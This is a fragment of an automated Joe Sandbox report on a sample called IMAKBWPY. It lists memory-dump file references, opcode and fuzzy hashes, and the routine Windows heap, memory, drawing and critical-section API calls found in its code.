                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$HeapVirtual$Destroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 716807051-0
                                                                                                                • Opcode ID: 68cf496447200ccad335cbbc8d5417631c9e2caa2e6786856f8dfbb8a889a857
                                                                                                                • Instruction ID: 3af9201d486d3a2bc1550db3e812f2ac337913510ad575134dfd4be215dbcdfe
                                                                                                                • Opcode Fuzzy Hash: 68cf496447200ccad335cbbc8d5417631c9e2caa2e6786856f8dfbb8a889a857
                                                                                                                • Instruction Fuzzy Hash: 25118E31244261EFE662AB14ECC5F8677A6FB41752F224515F680BB0B0C7A6A884CB68
                                                                                                                APIs
                                                                                                                • GetVersionExA.KERNEL32 ref: 1003D073
                                                                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 1003D0A8
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1003D108
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                • API String ID: 1385375860-4131005785
                                                                                                                • Opcode ID: 2b0a5279f758e68e820852b4a6ab7007167da66684b6d576116063d4997a3ac5
                                                                                                                • Instruction ID: ed782bebf34eaa52e622e5642e5b073096abae8f83f9496b0357b3f956fff298
                                                                                                                • Opcode Fuzzy Hash: 2b0a5279f758e68e820852b4a6ab7007167da66684b6d576116063d4997a3ac5
                                                                                                                • Instruction Fuzzy Hash: BD31E5719012987EEB27E6707C51BDE77A9DB02786F2004DBD145DE042E631DE8A9B11
                                                                                                                APIs
                                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 100033EC
                                                                                                                • RealizePalette.GDI32(?), ref: 10003404
                                                                                                                • DrawDibOpen.MSVFW32 ref: 10003462
                                                                                                                • DrawDibDraw.MSVFW32(?,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,00000100,?), ref: 100034F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Draw$Palette$OpenRealizeSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1891814295-0
                                                                                                                • Opcode ID: 6ecef0f22b69bc1dab65889e23e6c445aea72bafccd0e0917d0765b912a8707d
                                                                                                                • Instruction ID: 7de8fa35b9a59ec312cf17c4a1796b433de2423addd29be894cb64482c682cae
                                                                                                                • Opcode Fuzzy Hash: 6ecef0f22b69bc1dab65889e23e6c445aea72bafccd0e0917d0765b912a8707d
                                                                                                                • Instruction Fuzzy Hash: 06519EB56087809FD725CF28CC84AAFB7E9FBC9350F108A1DF99987245D730A905CB66
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2848605275-0
                                                                                                                • Opcode ID: 60180515bc8333a05ce828e1be6b6ded47a4dd99c852396ae82ab9c99da65fb7
                                                                                                                • Instruction ID: f4d2222e74b200e8fa4ad3175c6daf4646a8474858300107e58a26c286ec8854
                                                                                                                • Opcode Fuzzy Hash: 60180515bc8333a05ce828e1be6b6ded47a4dd99c852396ae82ab9c99da65fb7
                                                                                                                • Instruction Fuzzy Hash: 9F21DA3A408751AFE311DB24CC45B9BB7E8FF467A0F40061CFD95E3295DB39A604CA62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12b80107f73b384aef81afebbbc424e697dcac8ad07d0a6fcb164a6c046cb8cf
                                                                                                                • Instruction ID: 6d0082e819523c93d3346e6f2f60b76d7730bb7fd7ac9d96ea3bbeb4912191f3
                                                                                                                • Opcode Fuzzy Hash: 12b80107f73b384aef81afebbbc424e697dcac8ad07d0a6fcb164a6c046cb8cf
                                                                                                                • Instruction Fuzzy Hash: 6191E871D00A68AFDB13DF68CC85ADE7BB8EB057A6F200216F954BE191D7319D40CB64
                                                                                                                APIs
                                                                                                                • HeapAlloc.KERNEL32(00000000,00002020,1006BEC0,1006BEC0,?,?,1003E63B,?,00000010,?,00000009,00000009,?,1003ACF9,00000010), ref: 1003E190
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,1003E63B,?,00000010,?,00000009,00000009,?,1003ACF9,00000010), ref: 1003E1B4
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,1003E63B,?,00000010,?,00000009,00000009,?,1003ACF9,00000010), ref: 1003E1CE
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,1003E63B,?,00000010,?,00000009,00000009,?,1003ACF9,00000010), ref: 1003E28F
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,1003E63B,?,00000010,?,00000009,00000009,?,1003ACF9,00000010), ref: 1003E2A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual$FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 714016831-0
                                                                                                                • Opcode ID: 9d28bc642cb9faf6ac73232d4df42f1b3ab8b880938ccbd76460a28c0e81f7e0
                                                                                                                • Instruction ID: ab5047225322dd0f09e59da24c55032ec56d991d6f067e9f0e727b91528897e3
                                                                                                                • Opcode Fuzzy Hash: 9d28bc642cb9faf6ac73232d4df42f1b3ab8b880938ccbd76460a28c0e81f7e0
                                                                                                                • Instruction Fuzzy Hash: 693126B0640B959FE331CF24CC80B56BBE9FB44796F100229E2649B2D1E7B5AC80CB54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 558570063cdc581bfc17ad4b4f7e5e1a69142dd0098614b42d7a211b1c079b07
                                                                                                                • Instruction ID: b3d95f60d6eac5c5a1fc1799922740b16c976bc58ac93dbf79ef179987904ab4
                                                                                                                • Opcode Fuzzy Hash: 558570063cdc581bfc17ad4b4f7e5e1a69142dd0098614b42d7a211b1c079b07
                                                                                                                • Instruction Fuzzy Hash: E281C2B5E006049FEB04DFA4CC86AAFB7F9FF48640F41442DE546A7246EB35E9008BA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004A70: GlobalLock.KERNEL32 ref: 10004AA7
                                                                                                                  • Part of subcall function 10004A70: MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10004AC0
                                                                                                                  • Part of subcall function 10004A70: GetLastError.KERNEL32 ref: 10004ACD
                                                                                                                • __ftol.LIBCMT ref: 10006531
                                                                                                                • __ftol.LIBCMT ref: 1000654E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ftol$ErrorFileGlobalLastLockView
                                                                                                                • String ID: VUY
                                                                                                                • API String ID: 1067535631-1010590305
                                                                                                                • Opcode ID: e585e9573e9734a443a94634dfc999e58bd03f1afdfc2864826cc0f0fa7a1550
                                                                                                                • Instruction ID: 876d5011bf7d58695ab22d074388500ceeb6f2177cbcc5b1fef0a8467d6d7e81
                                                                                                                • Opcode Fuzzy Hash: e585e9573e9734a443a94634dfc999e58bd03f1afdfc2864826cc0f0fa7a1550
                                                                                                                • Instruction Fuzzy Hash: 45B1D5B5D002199BEF14DF58CC91BEFB7B9EF48740F14815DE805A7249EB71AA80CBA1
                                                                                                                APIs
                                                                                                                • InitializeCriticalSection.KERNEL32(?,1003C7A2,?,1003A92D), ref: 1003D43A
                                                                                                                • InitializeCriticalSection.KERNEL32 ref: 1003D442
                                                                                                                • InitializeCriticalSection.KERNEL32 ref: 1003D44A
                                                                                                                • InitializeCriticalSection.KERNEL32 ref: 1003D452
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 32694325-0
                                                                                                                • Opcode ID: a29f6b1f95e6bf8be67620d8916c5cdc55bebaf76ce8af77c34f41c08c1ddf74
                                                                                                                • Instruction ID: 1bafbb863b5484e60082c28ad5ba06cecf5275015ec66c6fcf44fbf888970b46
                                                                                                                • Opcode Fuzzy Hash: a29f6b1f95e6bf8be67620d8916c5cdc55bebaf76ce8af77c34f41c08c1ddf74
                                                                                                                • Instruction Fuzzy Hash: 92C002719014349BEE113B55DE858C53F77EB052A03010063E30452030CAE31CE4DFC4